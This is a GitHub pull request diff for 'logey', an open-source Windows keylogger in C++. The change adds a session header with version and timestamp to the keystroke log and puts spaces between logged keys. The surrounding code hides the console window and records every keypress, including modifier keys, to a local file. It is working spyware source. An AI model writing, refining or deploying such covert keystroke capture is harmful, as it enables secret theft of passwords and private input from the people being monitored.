### PR TITLE
Adjusted log file formatting

### DIFF
--- a/logey.cpp
+++ b/logey.cpp
@@ -1,8 +1,11 @@
 #include "logey.h"
+#include <time.h>
 
 int main() {
 
 	if (!debug) hideConsole();
+
+	createNewInstanceHeader("logey.log");
 
 	while (true) // infinite loop
 	{
@@ -24,40 +27,40 @@ void keys(int key, char *filename) {
 	switch (key) {
 	case VK_RETURN:
 		cout << endl;
-		fprintf(OUTPUT_FILE, "%s", "\n");
+		fprintf(OUTPUT_FILE, "%s ", "\n");
 		break;
 	case VK_SHIFT:
 		cout << "{SHIFT}";
-		fprintf(OUTPUT_FILE, "%s", "{SHIFT}");
+		fprintf(OUTPUT_FILE, "%s ", "{SHIFT}");
 		break;
 	case VK_SPACE:
 		cout << " ";
-		fprintf(OUTPUT_FILE, "%s", " ");
+		fprintf(OUTPUT_FILE, "%s ", " ");
 		break;
 	case VK_BACK:
 		cout << "{BACKSPACE}";
-		fprintf(OUTPUT_FILE, "%s", "{BACKSPACE}");
+		fprintf(OUTPUT_FILE, "%s ", "{BACKSPACE}");
 		break;
 	case VK_CONTROL:
 		cout << "{CONTROL}";
-		fprintf(OUTPUT_FILE, "%s", "{CONTROL}");
+		fprintf(OUTPUT_FILE, "%s ", "{CONTROL}");
 		break;
 	case VK_TAB:
 		cout << "{TAB}";
-		fprintf(OUTPUT_FILE, "%s", "{TAB}");
+		fprintf(OUTPUT_FILE, "%s ", "{TAB}");
 		break;
 	case VK_ESCAPE:
 		cout << "{ESCAPE}";
-		fprintf(OUTPUT_FILE, "%s", "{ESCAPE}");
+		fprintf(OUTPUT_FILE, "%s ", "{ESCAPE}");
 		break;
 	case VK_MENU:
 		cout << "{ALT}";
-		fprintf(OUTPUT_FILE, "%s", "{ALT}");
+		fprintf(OUTPUT_FILE, "%s ", "{ALT}");
 		break;
 	default:
 		char x = static_cast<char>(key);
 		cout << x;
-		fprintf(OUTPUT_FILE, "%s", &key);
+		fprintf(OUTPUT_FILE, "%s ", &key);
 		break;
 	}
 
@@ -69,4 +72,20 @@ void hideConsole() {
 	AllocConsole();
 	hideConsole = FindWindowA("ConsoleWindowClass", NULL);
 	ShowWindow(hideConsole, 0);
+}
+
+void createNewInstanceHeader(char *filename){
+	time_t currentTime;
+	time(&currentTime);
+
+	FILE *OUTPUT_FILE;
+	OUTPUT_FILE = fopen(filename, "a+");
+
+	fprintf(OUTPUT_FILE, "%s", "\n------------------");
+	fprintf(OUTPUT_FILE, "%s %.2f", "\nlogey --- a Windows keylogger\nauthor: exler\nlicense: MIT\nVersion:", LOGEY_VERSION_NUMBER);
+	fprintf(OUTPUT_FILE, "%s", "\n\nSession Timestamp : ");
+	fprintf(OUTPUT_FILE, "%s", ctime(&currentTime));
+	fprintf(OUTPUT_FILE, "%s", "\n------------------\n");
+
+	fclose(OUTPUT_FILE);
 }

--- a/logey.h
+++ b/logey.h
@@ -1,5 +1,5 @@
 #include <iostream>
-#include <Windows.h>
+#include <Windows.h>=
 
 using namespace std;
 
@@ -8,7 +8,8 @@ using namespace std;
 *	If true, the console will be shown and show live output.
 */
 bool debug = false;
-
+const double LOGEY_VERSION_NUMBER = 1.01;
 
 void keys(int key, char *filename);
 void hideConsole();
+void createNewInstanceHeader(char *filename);

--- a/logey.h
+++ b/logey.h
@@ -1,5 +1,5 @@
 #include <iostream>
-#include <Windows.h>=
+#include <Windows.h>
 
 using namespace std;
 


### PR DESCRIPTION
To address #4 
Added a header to the log file displaying the title, author, license, version number, and a time stamp in local 24 hour time.

Seperated logged keys with spaces to help make them more readable.

![logger](https://user-images.githubusercontent.com/10146723/31205749-ef30e1c4-a938-11e7-8d6d-7007c4ddaf0f.png)
